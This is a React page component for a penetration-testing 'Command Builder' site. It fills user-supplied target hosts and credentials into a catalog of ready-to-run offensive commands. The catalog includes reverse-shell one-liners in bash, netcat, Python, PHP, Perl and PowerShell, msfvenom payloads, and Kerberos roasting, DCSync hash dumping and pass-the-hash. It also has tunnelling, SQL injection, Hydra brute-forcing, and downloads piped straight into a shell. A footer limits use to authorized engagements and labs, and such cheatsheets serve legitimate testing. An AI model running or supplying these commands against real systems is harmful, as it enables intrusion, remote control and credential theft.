import { useState, useEffect, useMemo } from "react";
import SEO from "@/components/SEO";
import {
  Search, TerminalSquare, Radio, ArrowDownUp, KeyRound, Network, Globe, Lock,
  Wrench, Copy, Check, ClipboardList,
} from "lucide-react";

/* ──────────────────────────────────────────────
   INPUT VARIABLES
────────────────────────────────────────────── */
const FIELDS = [
  { key: "lhost", token: "LHOST", placeholder: "10.10.14.1" },
  { key: "lport", token: "LPORT", placeholder: "9001" },
  { key: "rhost", token: "RHOST", placeholder: "10.10.10.10" },
  { key: "rport", token: "RPORT", placeholder: "80" },
  { key: "url", token: "URL", placeholder: "http://10.10.10.10" },
  { key: "wordlist", token: "WORDLIST", placeholder: "/usr/share/wordlists/rockyou.txt" },
  { key: "domain", token: "DOMAIN", placeholder: "target.htb" },
  { key: "user", token: "USER", placeholder: "administrator" },
  { key: "pass", token: "PASS", placeholder: "P@ssw0rd" },
];

const DEFAULTS = {
  lhost: "10.10.14.1", lport: "9001", rhost: "10.10.10.10", rport: "80",
  url: "http://10.10.10.10", wordlist: "/usr/share/wordlists/rockyou.txt",
  domain: "target.htb", user: "administrator", pass: "P@ssw0rd",
};

const TOKEN_RE = /\{(LHOST|LPORT|RHOST|RPORT|URL|WORDLIST|DOMAIN|USER|PASS)\}/g;

/* ──────────────────────────────────────────────
   COMMAND CATALOG   (cmd: token string, note, tag)
────────────────────────────────────────────── */
const CATEGORIES = [
  {
    id: "recon", label: "Recon", icon: Search,
    commands: [
      { label: "Nmap — quick TCP", cmd: "nmap -sC -sV -oN nmap/initial {RHOST}", note: "Default scripts + version detection on default ports.", tag: "Net" },
      { label: "Nmap — all ports", cmd: "nmap -p- --min-rate 10000 -oN nmap/allports {RHOST}", note: "Full TCP sweep, then re-scan the open ones.", tag: "Net" },
      { label: "Nmap — UDP top 100", cmd: "sudo nmap -sU --top-ports 100 -oN nmap/udp {RHOST}", note: "UDP services are easy to miss.", tag: "Net" },
      { label: "Rustscan", cmd: "rustscan -a {RHOST} -- -sC -sV", note: "Very fast port discovery piped into nmap.", tag: "Net" },
      { label: "ffuf — directories", cmd: "ffuf -u {URL}/FUZZ -w {WORDLIST} -ic -c", note: "Directory & file brute force.", tag: "Web" },
      { label: "Gobuster — directories", cmd: "gobuster dir -u {URL} -w {WORDLIST} -t 50", note: "Classic content discovery.", tag: "Web" },
      { label: "feroxbuster — recursive", cmd: "feroxbuster -u {URL} -w {WORDLIST}", note: "Recursive content discovery.", tag: "Web" },
      { label: "ffuf — vhost / subdomain", cmd: "ffuf -u {URL} -H \"Host: FUZZ.{DOMAIN}\" -w {WORDLIST} -fs 0", note: "Filter size 0 to hide misses.", tag: "Web" },
      { label: "whatweb", cmd: "whatweb {URL}", note: "Fingerprint web technologies.", tag: "Web" },
      { label: "nuclei", cmd: "nuclei -u {URL}", note: "Template-based vulnerability scanner.", tag: "Web" },
    ],
  },
  {
    id: "shells", label: "Reverse Shells", icon: TerminalSquare,
    commands: [
      { label: "Bash — /dev/tcp", cmd: "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1", note: "Most common Linux one-liner.", tag: "Linux" },
      { label: "Bash — fd 196", cmd: "0<&196;exec 196<>/dev/tcp/{LHOST}/{LPORT}; sh <&196 >&196 2>&196", note: "Works when the simple one is filtered.", tag: "Linux" },
      { label: "nc — mkfifo", cmd: "rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f", note: "For netcat without -e support.", tag: "Linux" },
      { label: "nc -e", cmd: "nc -e /bin/sh {LHOST} {LPORT}", note: "Only if -e is compiled in.", tag: "Linux" },
      { label: "Python3 — pty", cmd: "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"{LHOST}\",{LPORT}));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn(\"/bin/bash\")'", note: "Spawns a pty straight away.", tag: "Linux" },
      { label: "PHP", cmd: "php -r '$sock=fsockopen(\"{LHOST}\",{LPORT});exec(\"/bin/sh -i <&3 >&3 2>&3\");'", note: "When PHP is available on target.", tag: "Web" },
      { label: "Perl", cmd: "perl -e 'use Socket;$i=\"{LHOST}\";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'", note: "Old boxes still ship Perl.", tag: "Linux" },
      { label: "PowerShell — one-liner", cmd: "powershell -nop -W hidden -noni -ep bypass -c \"$c=New-Object System.Net.Sockets.TCPClient('{LHOST}',{LPORT});$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($r=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$r);$sb=(iex $d 2>&1|Out-String);$sb2=$sb+'PS '+(pwd).Path+'> ';$by=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($by,0,$by.Length);$s.Flush()}\"", note: "Self-contained Windows callback.", tag: "Windows" },
      { label: "msfvenom — Linux ELF", cmd: "msfvenom -p linux/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf -o shell.elf", note: "Pair with multi/handler.", tag: "Linux" },
      { label: "msfvenom — Windows EXE", cmd: "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe -o shell.exe", note: "Meterpreter callback.", tag: "Windows" },
    ],
  },
  {
    id: "listeners", label: "Listeners", icon: Radio,
    commands: [
      { label: "netcat", cmd: "nc -lvnp {LPORT}", note: "The default catcher.", tag: "Any" },
      { label: "rlwrap + nc", cmd: "rlwrap -cAr nc -lvnp {LPORT}", note: "Arrow keys & history in the shell.", tag: "Any" },
      { label: "pwncat-cs", cmd: "pwncat-cs -lp {LPORT}", note: "Auto-stabilizes and adds tooling.", tag: "Any" },
      { label: "msf — multi/handler", cmd: "msfconsole -q -x \"use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST {LHOST}; set LPORT {LPORT}; set ExitOnSession false; run -j\"", note: "Catch msfvenom payloads.", tag: "Any" },
    ],
  },
  {
    id: "ad", label: "AD / Kerberos", icon: KeyRound,
    commands: [
      { label: "Kerbrute — user enum", cmd: "kerbrute userenum -d {DOMAIN} --dc {RHOST} {WORDLIST}", note: "Find valid domain users (no creds needed).", tag: "AD" },
      { label: "AS-REP roast", cmd: "impacket-GetNPUsers {DOMAIN}/ -dc-ip {RHOST} -usersfile users.txt -no-pass", note: "Users without Kerberos pre-auth.", tag: "AD" },
      { label: "Kerberoast", cmd: "impacket-GetUserSPNs {DOMAIN}/{USER}:{PASS} -dc-ip {RHOST} -request", note: "Request crackable service tickets.", tag: "AD" },
      { label: "Secretsdump (DCSync)", cmd: "impacket-secretsdump {DOMAIN}/{USER}:{PASS}@{RHOST}", note: "Dump hashes; DCSync if privileged.", tag: "AD" },
      { label: "NetExec — shares", cmd: "nxc smb {RHOST} -u {USER} -p {PASS} --shares", note: "Authenticated SMB share listing.", tag: "AD" },
      { label: "NetExec — pass-the-hash", cmd: "nxc smb {RHOST} -u {USER} -H <ntlm_hash>", note: "Authenticate with an NTLM hash.", tag: "AD" },
      { label: "BloodHound — collect", cmd: "nxc ldap {RHOST} -u {USER} -p {PASS} --bloodhound --dns-server {RHOST} -c All", note: "Pull the AD attack graph.", tag: "AD" },
      { label: "evil-winrm", cmd: "evil-winrm -i {RHOST} -u {USER} -p {PASS}", note: "Interactive shell over WinRM (port 5985).", tag: "AD" },
      { label: "ldapsearch", cmd: "ldapsearch -x -H ldap://{RHOST} -D '{USER}@{DOMAIN}' -w '{PASS}' -b 'dc=target,dc=htb'", note: "Raw LDAP enumeration.", tag: "AD" },
    ],
  },
  {
    id: "pivot", label: "Pivoting / Tunnels", icon: Network,
    commands: [
      { label: "chisel — server (you)", cmd: "chisel server -p {LPORT} --reverse", note: "Run on your box; target connects back.", tag: "Pivot" },
      { label: "chisel — client (target)", cmd: "chisel client {LHOST}:{LPORT} R:socks", note: "Opens a reverse SOCKS proxy to you.", tag: "Pivot" },
      { label: "ligolo — proxy (you)", cmd: "./proxy -selfcert -laddr 0.0.0.0:{LPORT}", note: "Modern tun-based pivoting.", tag: "Pivot" },
      { label: "ligolo — agent (target)", cmd: "./agent -connect {LHOST}:{LPORT} -ignore-cert", note: "Connects the agent back to the proxy.", tag: "Pivot" },
      { label: "SSH — local forward", cmd: "ssh -L 8080:127.0.0.1:80 {USER}@{RHOST}", note: "Expose a remote-only port locally.", tag: "Pivot" },
      { label: "SSH — dynamic SOCKS", cmd: "ssh -D 1080 {USER}@{RHOST}", note: "SOCKS proxy through SSH.", tag: "Pivot" },
      { label: "sshuttle", cmd: "sshuttle -r {USER}@{RHOST} 10.10.10.0/24", note: "Route a subnet like a VPN.", tag: "Pivot" },
      { label: "proxychains", cmd: "proxychains -q nmap -sT -Pn {RHOST}", note: "Send any tool through your SOCKS proxy.", tag: "Pivot" },
    ],
  },
  {
    id: "web", label: "Web / SQLi", icon: Globe,
    commands: [
      { label: "sqlmap — URL", cmd: "sqlmap -u \"{URL}/?id=1\" --batch --dbs", note: "Automated SQL injection discovery.", tag: "Web" },
      { label: "sqlmap — Burp request", cmd: "sqlmap -r request.txt --batch --dump", note: "Feed a saved Burp request.", tag: "Web" },
      { label: "LFI — php filter", cmd: "curl \"{URL}/?page=php://filter/convert.base64-encode/resource=index\"", note: "Read source through PHP filters.", tag: "Web" },
      { label: "nikto", cmd: "nikto -h {URL}", note: "Quick web server vuln scan.", tag: "Web" },
      { label: "wpscan", cmd: "wpscan --url {URL} --enumerate u,vp", note: "WordPress users & vulnerable plugins.", tag: "Web" },
      { label: "curl — headers", cmd: "curl -sI {URL}", note: "Inspect response headers fast.", tag: "Web" },
    ],
  },
  {
    id: "passwords", label: "Password Attacks", icon: Lock,
    commands: [
      { label: "Hydra — SSH", cmd: "hydra -l {USER} -P {WORDLIST} ssh://{RHOST}", note: "Online SSH password spray.", tag: "Brute" },
      { label: "Hydra — HTTP POST", cmd: "hydra -l {USER} -P {WORDLIST} {RHOST} http-post-form \"/login:user=^USER^&pass=^PASS^:Invalid\"", note: "Adjust the failure string.", tag: "Brute" },
      { label: "John — wordlist", cmd: "john --wordlist={WORDLIST} hash.txt", note: "Auto-detect & crack.", tag: "Crack" },
      { label: "Hashcat — NTLM", cmd: "hashcat -m 1000 hash.txt {WORDLIST}", note: "Mode 1000 = NTLM.", tag: "Crack" },
      { label: "Hashcat — Kerberoast", cmd: "hashcat -m 13100 hash.txt {WORDLIST}", note: "Mode 13100 = TGS-REP.", tag: "Crack" },
      { label: "ssh2john", cmd: "ssh2john id_rsa > hash.txt && john --wordlist={WORDLIST} hash.txt", note: "Crack an encrypted SSH key.", tag: "Crack" },
    ],
  },
  {
    id: "transfer", label: "File Transfer", icon: ArrowDownUp,
    commands: [
      { label: "HTTP server (you)", cmd: "python3 -m http.server 8000", note: "Serve files from the current dir.", tag: "Any" },
      { label: "wget (target)", cmd: "wget http://{LHOST}:8000/linpeas.sh -O /tmp/linpeas.sh", note: "Pull a file onto Linux.", tag: "Linux" },
      { label: "curl (target)", cmd: "curl http://{LHOST}:8000/linpeas.sh -o /tmp/linpeas.sh", note: "Alternative to wget.", tag: "Linux" },
      { label: "impacket — smbserver", cmd: "impacket-smbserver share . -smb2support", note: "Drop files over SMB.", tag: "Any" },
      { label: "certutil (Windows)", cmd: "certutil -urlcache -split -f http://{LHOST}:8000/shell.exe shell.exe", note: "LOLBin download on Windows.", tag: "Windows" },
      { label: "PowerShell — download", cmd: "powershell -c \"Invoke-WebRequest http://{LHOST}:8000/shell.exe -OutFile shell.exe\"", note: "IWR download.", tag: "Windows" },
      { label: "scp (push)", cmd: "scp ./file {USER}@{RHOST}:/tmp/file", note: "Copy over SSH.", tag: "Any" },
    ],
  },
  {
    id: "post", label: "Post / Shell Upgrade", icon: Wrench,
    commands: [
      { label: "TTY — python pty", cmd: "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'", note: "Step 1 of a proper shell.", tag: "Linux" },
      { label: "TTY — stabilize", cmd: "stty raw -echo; fg   # after Ctrl+Z, then: export TERM=xterm", note: "Step 2: full interactive TTY.", tag: "Linux" },
      { label: "linpeas (curl | sh)", cmd: "curl http://{LHOST}:8000/linpeas.sh | sh", note: "Linux privesc enumeration.", tag: "Linux" },
      { label: "NetExec — null session", cmd: "nxc smb {RHOST} -u '' -p '' --shares", note: "Anonymous SMB access check.", tag: "AD" },
      { label: "smbclient — list shares", cmd: "smbclient -L //{RHOST}/ -N", note: "List shares without creds.", tag: "AD" },
      { label: "NetExec — RID brute", cmd: "nxc smb {RHOST} -u 'guest' -p '' --rid-brute", note: "Enumerate users via RID cycling.", tag: "AD" },
    ],
  },
];

const TOTAL_COMMANDS = CATEGORIES.reduce((n, c) => n + c.commands.length, 0);
const STORAGE_KEY = "cb-inputs-v2";

const TAG_STYLES = {
  Net: "border-cyan-400/30 text-cyan-300", Web: "border-violet-400/30 text-violet-300",
  Linux: "border-emerald-400/30 text-emerald-300", Windows: "border-sky-400/30 text-sky-300",
  AD: "border-amber-400/30 text-amber-300", Pivot: "border-fuchsia-400/30 text-fuchsia-300",
  Brute: "border-rose-400/30 text-rose-300", Crack: "border-rose-400/30 text-rose-300",
  Any: "border-slate-500/40 text-slate-400",
};

const CommandBuilder = () => {
  const [inputs, setInputs] = useState(DEFAULTS);
  const [activeCat, setActiveCat] = useState("recon");
  const [query, setQuery] = useState("");
  const [copiedKey, setCopiedKey] = useState(null);

  useEffect(() => {
    try {
      const saved = JSON.parse(localStorage.getItem(STORAGE_KEY) || "null");
      if (saved && typeof saved === "object") setInputs((p) => ({ ...p, ...saved }));
    } catch { /* ignore */ }
  }, []);

  const update = (key, value) => {
    setInputs((prev) => {
      const next = { ...prev, [key]: value };
      try { localStorage.setItem(STORAGE_KEY, JSON.stringify(next)); } catch { /* ignore */ }
      return next;
    });
  };

  const reset = () => {
    setInputs(DEFAULTS);
    try { localStorage.removeItem(STORAGE_KEY); } catch { /* ignore */ }
  };

  // token (LHOST) -> current value
  const tokenVals = useMemo(() => {
    const v = {};
    for (const f of FIELDS) v[f.token] = (inputs[f.key] ?? "").trim();
    return v;
  }, [inputs]);

  const fillPlain = (cmd) => cmd.replace(TOKEN_RE, (_, k) => tokenVals[k] || `{${k}}`);

  // split a command into static text + highlighted variable spans
  const parts = (cmd) => {
    const out = [];
    let last = 0, m;
    TOKEN_RE.lastIndex = 0;
    while ((m = TOKEN_RE.exec(cmd)) !== null) {
      if (m.index > last) out.push({ t: "text", s: cmd.slice(last, m.index) });
      const val = tokenVals[m[1]];
      out.push({ t: "var", s: val || `{${m[1]}}`, empty: !val });
      last = m.index + m[0].length;
    }
    if (last < cmd.length) out.push({ t: "text", s: cmd.slice(last) });
    return out;
  };

  const visible = useMemo(() => {
    const q = query.trim().toLowerCase();
    if (q) {
      const hits = [];
      for (const c of CATEGORIES) {
        for (const cmd of c.commands) {
          if (cmd.label.toLowerCase().includes(q) || cmd.cmd.toLowerCase().includes(q) || c.label.toLowerCase().includes(q)) {
            hits.push({ ...cmd, cat: c.label });
          }
        }
      }
      return { list: hits, filtering: true };
    }
    const c = CATEGORIES.find((x) => x.id === activeCat) || CATEGORIES[0];
    return { list: c.commands.map((cmd) => ({ ...cmd, cat: c.label })), filtering: false };
  }, [query, activeCat]);

  const copy = (key, cmd) => {
    navigator.clipboard?.writeText(fillPlain(cmd));
    setCopiedKey(key);
    setTimeout(() => setCopiedKey((k) => (k === key ? null : k)), 1600);
  };

  const copyCheatsheet = () => {
    const text = visible.list
      .map((c) => `# ${c.label}${c.note ? `  — ${c.note}` : ""}\n${fillPlain(c.cmd)}`)
      .join("\n\n");
    navigator.clipboard?.writeText(text);
    setCopiedKey("__all__");
    setTimeout(() => setCopiedKey((k) => (k === "__all__" ? null : k)), 1600);
  };

  return (
    <div className="min-h-screen bg-[#070a0e] bg-[linear-gradient(rgba(0,255,136,.012)_1px,transparent_1px),linear-gradient(90deg,rgba(0,255,136,.012)_1px,transparent_1px)] bg-[size:44px_44px] text-slate-300">
      <SEO
        title="Command Builder"
        description="Offensive security command generator — nmap recon, reverse shells, Active Directory & Kerberos, pivoting, SQLi, and password attacks. Fill in your targets and copy ready-to-run commands."
        canonical="/command-builder"
      />

      <section className="mx-auto max-w-6xl px-6 py-16 md:py-20">
        {/* Header */}
        <div className="mb-5 inline-flex items-center gap-2 border border-slate-800 bg-[#0c1118] px-4 py-2 font-mono text-xs uppercase tracking-[0.16em] text-slate-500">
          <span className="text-emerald-400">$</span>
          command-builder
          <span className="ml-2 text-emerald-400/80">{TOTAL_COMMANDS} commands</span>
          <span className="text-slate-700">·</span>
          <span className="text-slate-500">{CATEGORIES.length} categories</span>
        </div>
        <h1 className="mb-3 max-w-3xl font-heading text-4xl font-bold leading-[1.0] tracking-[-0.04em] text-slate-100 md:text-5xl">
          Fill in the targets. Copy ready-to-run commands.
        </h1>
        <p className="mb-8 max-w-2xl text-sm leading-7 text-slate-400">
          A working operator cheatsheet: set your LHOST / RHOST / creds once and every snippet updates live — recon,
          reverse shells, Active Directory, pivoting, web, and password attacks. Built for real engagements and CTF labs.
        </p>

        {/* Inputs */}
        <div className="mb-6 border border-slate-800 bg-[#0c1118]">
          <div className="flex items-center justify-between border-b border-slate-800 px-4 py-2.5">
            <span className="font-mono text-[10px] uppercase tracking-[0.16em] text-slate-500">// variables</span>
            <button onClick={reset} className="font-mono text-[10px] uppercase tracking-[0.14em] text-slate-500 transition hover:text-emerald-400">
              reset
            </button>
          </div>
          <div className="grid grid-cols-2 gap-px bg-slate-800 sm:grid-cols-3 lg:grid-cols-3">
            {FIELDS.map((f) => (
              <label key={f.key} className="flex flex-col gap-1.5 bg-[#0c1118] px-3 py-3">
                <span className="font-mono text-[10px] uppercase tracking-[0.14em] text-emerald-400/80">{f.token}</span>
                <input
                  value={inputs[f.key]}
                  onChange={(e) => update(f.key, e.target.value)}
                  placeholder={f.placeholder}
                  spellCheck={false}
                  autoComplete="off"
                  className="w-full bg-transparent font-mono text-[13px] text-slate-100 outline-none placeholder:text-slate-600"
                />
              </label>
            ))}
          </div>
        </div>

        {/* Search + copy all */}
        <div className="mb-5 flex flex-col gap-3 sm:flex-row sm:items-center">
          <div className="flex flex-1 items-center gap-2 border border-slate-800 bg-[#0c1118] px-3 py-2">
            <Search className="h-4 w-4 text-slate-500" />
            <input
              value={query}
              onChange={(e) => setQuery(e.target.value)}
              placeholder="Search all commands (e.g. kerberos, ffuf, smb)…"
              spellCheck={false}
              className="w-full bg-transparent font-mono text-[13px] text-slate-100 outline-none placeholder:text-slate-600"
            />
            {query && (
              <button onClick={() => setQuery("")} className="font-mono text-[10px] uppercase text-slate-500 hover:text-emerald-400">clear</button>
            )}
          </div>
          <button
            onClick={copyCheatsheet}
            className={`inline-flex items-center justify-center gap-2 border px-3.5 py-2 font-mono text-[11px] uppercase tracking-[0.12em] transition ${
              copiedKey === "__all__"
                ? "border-emerald-400/50 bg-emerald-400/10 text-emerald-300"
                : "border-slate-800 text-slate-400 hover:border-emerald-400/40 hover:text-emerald-300"
            }`}
          >
            {copiedKey === "__all__" ? <><Check className="h-3.5 w-3.5" /> Copied</> : <><ClipboardList className="h-3.5 w-3.5" /> Copy all ({visible.list.length})</>}
          </button>
        </div>

        {/* Category tabs (hidden while searching) */}
        {!visible.filtering && (
          <div className="mb-6 flex flex-wrap gap-2">
            {CATEGORIES.map((c) => {
              const Icon = c.icon;
              const on = c.id === activeCat;
              return (
                <button
                  key={c.id}
                  onClick={() => setActiveCat(c.id)}
                  className={`inline-flex items-center gap-2 border px-3.5 py-2 font-mono text-xs uppercase tracking-[0.12em] transition ${
                    on ? "border-emerald-400/40 bg-emerald-400/10 text-emerald-300"
                       : "border-slate-800 text-slate-400 hover:border-slate-600 hover:text-slate-200"
                  }`}
                >
                  <Icon className="h-3.5 w-3.5" />
                  {c.label}
                  <span className="text-slate-600">{c.commands.length}</span>
                </button>
              );
            })}
          </div>
        )}

        {/* Command cards */}
        {visible.list.length === 0 ? (
          <div className="border border-slate-800 bg-[#0c1118] px-4 py-10 text-center font-mono text-sm text-slate-500">
            No commands match “{query}”.
          </div>
        ) : (
          <div className="grid gap-3 md:grid-cols-2">
            {visible.list.map((c, idx) => {
              const key = `${c.cat}-${c.label}-${idx}`;
              const isCopied = copiedKey === key;
              return (
                <div key={key} className="group flex flex-col border border-slate-800 bg-[#0c1118] transition hover:border-emerald-400/30">
                  <div className="flex items-center justify-between gap-3 border-b border-slate-800 px-4 py-2.5">
                    <div className="flex min-w-0 items-center gap-2">
                      <span className="truncate font-mono text-[11px] uppercase tracking-[0.12em] text-slate-300">{c.label}</span>
                      {c.tag && (
                        <span className={`shrink-0 border px-1.5 py-0.5 font-mono text-[9px] uppercase tracking-[0.1em] ${TAG_STYLES[c.tag] || TAG_STYLES.Any}`}>{c.tag}</span>
                      )}
                      {visible.filtering && (
                        <span className="shrink-0 font-mono text-[9px] uppercase tracking-[0.1em] text-slate-600">/ {c.cat}</span>
                      )}
                    </div>
                    <button
                      onClick={() => copy(key, c.cmd)}
                      aria-label={`Copy ${c.label}`}
                      className={`inline-flex shrink-0 items-center gap-1.5 border px-2.5 py-1 font-mono text-[10px] uppercase tracking-[0.12em] transition ${
                        isCopied ? "border-emerald-400/50 bg-emerald-400/10 text-emerald-300"
                                 : "border-slate-700 text-slate-400 hover:border-emerald-400/40 hover:text-emerald-300"
                      }`}
                    >
                      {isCopied ? <><Check className="h-3 w-3" /> Copied</> : <><Copy className="h-3 w-3" /> Copy</>}
                    </button>
                  </div>
                  <pre className="overflow-x-auto px-4 pt-3 font-mono text-[12.5px] leading-6 text-slate-300">
                    <code>
                      {parts(c.cmd).map((p, k) =>
                        p.t === "var"
                          ? <span key={k} className={p.empty ? "text-amber-300/70" : "text-emerald-300"}>{p.s}</span>
                          : <span key={k}>{p.s}</span>
                      )}
                    </code>
                  </pre>
                  {c.note && <p className="px-4 pb-3 pt-2 text-[11.5px] leading-5 text-slate-500">{c.note}</p>}
                </div>
              );
            })}
          </div>
        )}

        <p className="mt-8 font-mono text-[11px] leading-6 text-slate-600">
          // variables in <span className="text-emerald-300">green</span> are filled from your inputs · for authorized engagements, CTF labs, and your own systems only.
        </p>
      </section>
    </div>
  );
};

export default CommandBuilder;
